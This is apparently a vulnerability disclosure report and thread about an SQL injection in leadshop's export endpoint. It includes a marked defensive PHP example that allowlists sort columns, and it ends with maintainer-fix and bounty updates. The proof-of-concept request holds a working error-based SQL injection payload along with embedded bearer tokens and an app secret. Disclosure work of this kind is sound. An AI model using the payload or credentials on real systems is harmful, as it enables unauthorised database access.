SQL injection at exportUsers function in qmpaas/leadshop
Valid
Reported on May 26th 2022
Description
SQL injection in the exportUsers function via the sort query parameter.
Proof of Concept
GET /index.php?q=/api/leadmall/statistical&behavior=exportGoods&sort={"updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)--+-":"asd"} HTTP/1.1
Host: demo.leadshop.vip
Cookie: _csrf=fefe3c31fa6dbee72cd8e6a1e3b010398cfeed682f0198b879af18dbd5d5e5c8a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22SQDJuf-G631HB3SFwAjpH8ZW9XfM-nci%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImF1ZCI6Imh0dHBzOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyIsImlhdCI6MTY1MzU4MzAxNiwiZXhwIjoxNjU2MTc1MDE2LCJpZCI6MX0.O11reWZxDohDWiW9eqeTK0mvvxVy_xwwM4h7g5lwjXs
Qm-App-Type: undefined
Qm-App-Id: 98c08c25f8136d590c
Qm-App-Secret: 3AYpU16dZ1CY7ejqvrE39B351vanLJVD
Origin: https://demo.leadshop.vip
Referer: https://demo.leadshop.vip/index.php?r=admin%2Findex
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close
Poc Image
Impact
An attacker can modify the query and retrieve all data in the database.
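The PoC above works because the key of the JSON object in the sort parameter reaches the ORDER BY clause as a column name. The following is an added example of the defensive pattern for that class of bug, not leadshop's code and not the maintainer's fix: it assumes the handler json-decodes the sort parameter and turns each key into a sort column, and the column and table names it allowlists are assumptions. Every key and direction is compared against a fixed allowlist, so no user-controlled text is ever concatenated into SQL.

```php
<?php
// Added example (not leadshop's code): allowlist-based handling of a JSON
// "sort" query parameter before it reaches ORDER BY. Column and table names
// here are assumptions for illustration.

declare(strict_types=1);

final class SortParamValidator
{
    /** Columns the export endpoint may sort by (assumed names). */
    private const ALLOWED_COLUMNS = ['id', 'created_time', 'updated_time', 'nickname'];

    /** Accepted direction values, mapped to the SQL keyword that will be emitted. */
    private const DIRECTIONS = ['asc' => 'ASC', 'desc' => 'DESC'];

    /**
     * Parse the raw ?sort= value and return [column => 'ASC'|'DESC'] pairs.
     * Anything that is not an allowlisted column with an allowlisted direction
     * is rejected, so a key such as an SQL function call can never be used.
     *
     * @param mixed $raw the query parameter as received (string, array or null)
     * @return array<string,string>
     * @throws InvalidArgumentException on malformed or disallowed input
     * @throws JsonException on invalid JSON
     */
    public static function parse($raw): array
    {
        if ($raw === null || $raw === '') {
            return ['id' => 'ASC']; // default ordering when no sort is requested
        }
        if (!is_string($raw)) {
            // ?sort[]=x arrives as an array; refuse it instead of guessing
            throw new InvalidArgumentException('sort must be a JSON string');
        }
        $decoded = json_decode($raw, true, 512, JSON_THROW_ON_ERROR);
        if (!is_array($decoded) || $decoded === []) {
            throw new InvalidArgumentException('sort must be a non-empty JSON object');
        }
        $orderBy = [];
        foreach ($decoded as $column => $direction) {
            // Exact, strict comparison against the allowlist: no normalisation,
            // no quoting tricks, no expressions.
            if (!is_string($column) || !in_array($column, self::ALLOWED_COLUMNS, true)) {
                throw new InvalidArgumentException('sort column not allowed');
            }
            $dir = is_string($direction) ? strtolower($direction) : '';
            if (!isset(self::DIRECTIONS[$dir])) {
                throw new InvalidArgumentException('sort direction must be asc or desc');
            }
            $orderBy[$column] = self::DIRECTIONS[$dir];
        }
        return $orderBy;
    }

    /** Build the ORDER BY clause from validated pairs only. */
    public static function toSql(array $orderBy): string
    {
        $parts = [];
        foreach ($orderBy as $column => $dir) {
            $parts[] = '`' . $column . '` ' . $dir;
        }
        return 'ORDER BY ' . implode(', ', $parts);
    }
}

// Usage, e.g. inside the controller action that handles the export request.
// The table name "user" is an assumption.
try {
    $orderBy = SortParamValidator::parse($_GET['sort'] ?? null);
    $sql = 'SELECT id, nickname FROM `user` ' . SortParamValidator::toSql($orderBy);
    // Execute $sql through a prepared statement; any filter values are bound
    // as parameters, never interpolated. ORDER BY identifiers cannot be bound,
    // which is exactly why they must come from the allowlist above.
} catch (InvalidArgumentException | JsonException $e) {
    http_response_code(400);
    header('Content-Type: application/json');
    echo json_encode(['error' => $e->getMessage()]);
}
```

The design point is that ORDER BY identifiers cannot be passed as bound parameters, so validation has to happen by mapping the user's input onto a server-side list of permitted columns rather than by escaping or quoting it. A request carrying any key outside that list, including the one in the PoC, is rejected with a 400 before a query is built, which also gives the application log a clean signal to alert on.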
We are processing your report and will contact the qmpaas/leadshop team within 24 hours.
2 months ago
We have contacted a member of the qmpaas/leadshop team and are waiting to hear back
2 months ago
We have sent a follow up to the qmpaas/leadshop team. We will try again in 7 days.
2 months ago
We have sent a second follow up to the qmpaas/leadshop team. We will try again in 10 days.
2 months ago
No update. Let's wait for the remaining notifications to go out to the maintainer. Once the final notification has been sent, feel free to get in touch again, and I will reach out to the maintainers on your behalf 👍
We have sent a third and final follow up to the qmpaas/leadshop team. This report is now considered stale.
2 months ago
Hi @admin, looks like the maintainer fixed it at https://github.com/qmpaas/leadshop/commit/44dba1c86b7b2cfcd4594a25335f8628b650d37e#diff-2f55bd65e7f3d17890b89a77f76ee040e12d09519ff5668c12ffefc40ecdb2cc
The researcher's credibility has increased: +7
leadshop开源商城 has been awarded the fix bounty
We can, as long as the maintainer is happy to assign and publish one for this report.
@maintainer?